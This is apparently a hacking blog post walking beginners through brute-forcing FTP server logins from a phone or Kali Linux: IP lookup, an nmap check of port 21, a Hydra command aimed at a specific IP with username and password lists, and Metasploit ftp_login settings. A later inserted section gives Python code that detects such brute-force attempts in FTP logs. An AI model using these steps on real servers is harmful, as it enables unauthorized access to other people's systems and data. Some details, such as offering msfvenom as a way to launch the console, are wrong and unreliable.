Hi, hackstars. In this post I’m going to take you all the way through attacking an FTP server and gaining root access to manipulate databases. All these actions can be done from either a smartphone or a PC. So let’s get started.

For smartphone users:

  • Install Termux via the Play Store. Open Termux; it will install all the necessary packages (this takes a few seconds, depending on your connection speed). Now type these commands to download the necessary packages.

apt-get update &&  apt-get upgrade

pkg install python

pkg install python2

pkg install git

pkg install dnsutils

pkg install nmap

Now we are ready to go…

Using Hydra:

Smartphone users just need to install Hydra, which can be done with the following command:

pkg install hydra

For Linux PC users (especially Kali Linux), Hydra is pre-installed.

Now both smartphone users and Linux PC users just type the commands as shown:

1. First, you have to find out the IP address of the website you want to attack. For this, you can try dnslookup or any online tool like iplookup or reverse DNS.

2. Now it’s time to check whether the FTP port is up or not. For this, use nmap.

3. It will give its output; check whether the FTP port (port 21) is open or up.

Here, as you can see, port 21 (the FTP port) is open, so we can proceed with the attack.

4. Choose a username list and a password list for brute-forcing the FTP admin panel. For Kali Linux users, many password lists are available in
/usr/share/wordlists/

Smartphone users can download a username list and a password list from any website they want, or they can even create a .txt file and write the passwords in it line by line.
The same procedure applies to usernames too.

5. Now the final step is to launch the attack via Hydra.

The syntax for Hydra is:

hydra -d -L /path/to/username-list -P /path/to/password-list ftp://ip_address

In my case, the username list file is username.txt and the password list file is password.txt, and both are stored in the downloads folder of my phone.
So, here’s the command in my case:

 

hydra -d  -L /storage/emulated/0/username.txt -P /storage/emulated/0/password.txt ftp://50.60.120.13

Here, -d will show you each password attempt; you can also leave it out. It’s optional.
Also, if you want to use only one username, you can use -l (small L) in place of -L and then, in place of the username file path, just write the username that you want. The same goes for the password: if you want to use only one password, just replace -P with -p.

Now you are all done; if any password matches, it will show you the result.

 

Using Metasploit:

  • Smartphone users just need to install Metasploit-Framework, which can be done with the following commands:

pkg install unstable-repo

pkg install metasploit

  • For Linux PC users (especially Kali Linux), Metasploit is pre-installed.

Now we can get started,

1. First, launch Metasploit-Framework by typing the following command:

msfconsole

or

msfvenom

2. Now write the following commands:

msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254

msf auxiliary(ftp_login) > set THREADS 205

msf auxiliary(ftp_login) > set USERNAME username-list

msf auxiliary(ftp_login) > set PASSWORD password-list

If you want to use a username list or a password list, you can simply write the path at the suitable positions.

Now just be patient and let it crack the admin panel.
Once it gets the correct ID and password, it will show them to you.

So, this is how you hack an FTP server using either Hydra or Metasploit-Framework.
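Seen from the server side, both tools leave the same trace in the FTP log: a burst of failed logins from one client, sometimes followed by a success. The Python below is an added example, not part of the original post; it scans vsftpd-style log lines for that pattern. The log format, the threshold of 5 failures in 60 seconds and the sample lines (documentation IP ranges) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in vsftpd's native log style (format is an assumption).
SAMPLE_LOG = """\
Mon Jan  6 10:15:01 2025 [pid 4101] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan  6 10:15:02 2025 [pid 4102] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan  6 10:15:02 2025 [pid 4090] [alice] FAIL LOGIN: Client "198.51.100.20"
Mon Jan  6 10:15:03 2025 [pid 4103] [root] FAIL LOGIN: Client "203.0.113.7"
Mon Jan  6 10:15:04 2025 [pid 4104] [root] FAIL LOGIN: Client "203.0.113.7"
Mon Jan  6 10:15:05 2025 [pid 4105] [ftp] FAIL LOGIN: Client "203.0.113.7"
Mon Jan  6 10:15:09 2025 [pid 4091] [alice] OK LOGIN: Client "198.51.100.20"
Mon Jan  6 10:15:11 2025 [pid 4106] [admin] OK LOGIN: Client "203.0.113.7"
"""

LINE_RE = re.compile(
    r'^(\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[([^\]]*)\] (OK|FAIL) LOGIN: Client "([^"]+)"')

def parse(line):
    """Return (timestamp, user, succeeded, client_ip), or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    stamp = " ".join(m.group(1).split())  # collapse the padded day-of-month
    ts = datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y")
    return ts, m.group(2), m.group(3) == "OK", m.group(4)

def detect(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Flag clients with >= max_failures failed logins inside `window`."""
    recent = defaultdict(deque)  # ip -> timestamps of failures still in window
    tried = defaultdict(set)     # ip -> usernames seen in failed attempts
    alerts = {}                  # ip -> alert record
    events = filter(None, map(parse, log_text.splitlines()))
    for ts, user, ok, ip in events:
        if ok:
            # A success from an already-flagged client means a guess worked.
            if ip in alerts and alerts[ip]["compromised"] is None:
                alerts[ip]["compromised"] = user
            continue
        tried[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= max_failures and ip not in alerts:
            alerts[ip] = {"first_alert": ts, "users": tried[ip], "compromised": None}
    return alerts
```

An alert whose "compromised" field is set is the one to act on first: that account's password was guessed and should be reset, and the client blocked.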

Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.

If you need any help, feel free to ask me in the comments.

Thanks for coming. If you like it, then please share it; it will be appreciated.😄

